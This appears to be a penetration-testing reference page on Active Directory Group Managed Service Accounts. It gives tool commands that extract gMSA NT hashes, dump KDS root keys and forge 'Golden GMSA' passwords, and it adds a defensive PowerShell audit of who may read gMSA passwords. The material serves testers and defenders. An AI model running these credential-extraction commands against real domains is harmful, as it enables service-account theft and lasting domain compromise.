Password - GMSA
Reading GMSA Password
User accounts created to be used as service accounts rarely have their password changed. Group Managed Service Accounts (GMSAs) provide a better approach (available since the Windows Server 2012 timeframe): the password is managed by AD and automatically rotated every 30 days to a randomly generated password of 256 bytes.
GMSA Attributes in the Active Directory

- msDS-GroupMSAMembership (PrincipalsAllowedToRetrieveManagedPassword) - stores the security principals that can access the GMSA password.
- msDS-ManagedPassword - This attribute contains a BLOB with password information for group-managed service accounts.
- msDS-ManagedPasswordId - This constructed attribute contains the key identifier for the current managed password data for a group MSA.
- msDS-ManagedPasswordInterval - This attribute is used to retrieve the number of days before a managed password is automatically changed for a group MSA.
Extract NT hash from the Active Directory

- CrackMapExec (use `--lsa` first to obtain the GMSA ID):

```bash
# Use --lsa to get GMSA ID
crackmapexec ldap domain.lab -u user -p 'PWD' --gmsa-convert-id 00[...]99
crackmapexec ldap domain.lab -u user -p 'PWD' --gmsa-decrypt-lsa '_SC_GMSA_{[...]}_.....'
```

- bloodyAD:

```bash
bloodyAD --host 10.10.10.10 -d crash.lab -u john -p 'Pass123*' get search --filter '(ObjectClass=msDS-GroupManagedServiceAccount)' --attr msDS-ManagedPassword
```

- GMSAPasswordReader:

```powershell
GMSAPasswordReader.exe --accountname SVC_SERVICE_ACCOUNT
```

- gMSADumper:

```bash
python3 gMSADumper.py -u User -p Password1 -d domain.local
```

- Active Directory PowerShell (the `ConvertFrom-ADManagedPasswordBlob` and `ConvertTo-NTHash` cmdlets come from the DSInternals module):

```powershell
$gmsa  = Get-ADServiceAccount -Identity 'SVC_SERVICE_ACCOUNT' -Properties 'msDS-ManagedPassword'
$blob  = $gmsa.'msDS-ManagedPassword'
$mp    = ConvertFrom-ADManagedPasswordBlob $blob
$hash1 = ConvertTo-NTHash -Password $mp.SecureCurrentPassword
```

- kdejoyce/gMSA_Permissions_Collection.ps1, based on the Active Directory PowerShell module
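An added defender-side audit, not from the original page, built on the same Active Directory PowerShell module: it lists every gMSA, the principals allowed to retrieve its password (msDS-GroupMSAMembership) and the rotation interval, and flags readers that are too broad. The SIDs and RIDs treated as "too broad" and the 30-day threshold are assumptions to adjust per environment.

```powershell
# Added audit example (not from the original page). Requires the ActiveDirectory
# module and read access to the domain; run it from a domain-joined host.
Import-Module ActiveDirectory

# What counts as "too broad" is an assumption; adjust to your environment.
$BroadSids = @('S-1-1-0', 'S-1-5-11')          # Everyone, Authenticated Users
$BroadRids = @('513', '515', '545')            # Domain Users, Domain Computers, Users

function Get-GmsaPasswordReaders {
    # Only group MSAs carry msDS-GroupMSAMembership; standalone MSAs are excluded by the filter.
    $accounts = Get-ADServiceAccount -Filter 'objectClass -eq "msDS-GroupManagedServiceAccount"' `
        -Properties PrincipalsAllowedToRetrieveManagedPassword, 'msDS-ManagedPasswordInterval'

    foreach ($gmsa in $accounts) {
        $interval = $gmsa.'msDS-ManagedPasswordInterval'
        $readers  = @($gmsa.PrincipalsAllowedToRetrieveManagedPassword)
        if ($readers.Count -eq 0) {
            [pscustomobject]@{ gMSA = $gmsa.SamAccountName; Reader = '<none>'; Sid = '';
                               IntervalDays = $interval; Finding = 'No principal may retrieve the password' }
            continue
        }
        foreach ($dn in $readers) {
            # Each entry is a distinguished name; resolve it to a SID to compare with the lists above.
            $obj = Get-ADObject -Identity $dn -Properties objectSid
            $sid = $obj.objectSid.Value
            $rid = $sid.Split('-')[-1]
            $finding = @()
            if ($BroadSids -contains $sid -or $BroadRids -contains $rid) { $finding += 'Overly broad reader' }
            if ($obj.ObjectClass -eq 'user')                               { $finding += 'Individual user rather than a group or host' }
            if ($interval -gt 30)                                          { $finding += "Interval $interval days exceeds default 30" }
            [pscustomobject]@{ gMSA = $gmsa.SamAccountName; Reader = $obj.Name; Sid = $sid;
                               IntervalDays = $interval; Finding = ($finding -join '; ') }
        }
    }
}

# Rows with a non-empty Finding column are the ones to review first.
Get-GmsaPasswordReaders | Sort-Object Finding -Descending | Format-Table -AutoSize
```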
Forging Golden GMSA
One notable difference between a Golden Ticket attack and the Golden GMSA attack is that there is no way of rotating the KDS root key secret. Therefore, if a KDS root key is compromised, there is no way to protect the gMSAs associated with it.

⚠️ You can't "force reset" a gMSA password, because a gMSA's password never changes. The password is derived from the KDS root key and ManagedPasswordIntervalInDays, so every Domain Controller can at any time compute what the password is, what it used to be, and what it will be at any point in the future.
- Using GoldenGMSA:

```powershell
# Enumerate all gMSAs
GoldenGMSA.exe gmsainfo
# Query for a specific gMSA
GoldenGMSA.exe gmsainfo --sid S-1-5-21-1437000690-1664695696-1586295871-1112
# Dump all KDS Root Keys
GoldenGMSA.exe kdsinfo
# Dump a specific KDS Root Key
GoldenGMSA.exe kdsinfo --guid 46e5b8b9-ca57-01e6-e8b9-fbb267e4adeb
# Compute gMSA password
#   --sid <gMSA SID>: SID of the gMSA (required)
#   --kdskey <Base64-encoded blob>: Base64 encoded KDS Root Key
#   --pwdid <Base64-encoded blob>: Base64 of msds-ManagedPasswordID attribute value
GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 # requires privileged access to the domain
GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45UZXyuYB[...]G2/M= # requires LDAP access
GoldenGMSA.exe compute --sid S-1-5-21-1437000690-1664695696-1586295871-1112 --kdskey AQAAALm45U[...]SM0R7djG2/M= --pwdid AQAAA[..]AAA # Offline mode
```